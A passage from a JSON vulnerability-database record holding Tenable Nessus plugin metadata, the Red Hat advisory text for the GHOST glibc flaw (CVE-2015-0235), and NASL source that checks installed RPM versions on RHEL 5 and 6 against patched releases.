(rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["references", "modified", "sourceData"], "edition": 7, "lastseen": "2018-09-09T16:05:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 8, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "907d5d6251dbbdb77a799cb2f6abed86e3ac78246d5794fc363e2f07c3323b85", "hashmap": [{"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "34300f4f1f032d3872fb6c361a5e32b1", "key": "sourceData"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "d724cd7c7bdb670117d239f0719c8bcd", "key": "references"}, {"hash": "e010fd952706847a7e7ec9bd37c23380", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "3c764d4cf584f9ded7aa4dcca57c78ff", "key": "modified"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-11-13T16:59:52", "modified": "2018-11-10T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["https://access.redhat.com/errata/RHSA-2015:0099", "https://access.redhat.com/security/cve/cve-2015-0235"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/10 11:49:54\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["modified", "cpe", "sourceData"], "edition": 8, "lastseen": "2018-11-13T16:59:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", 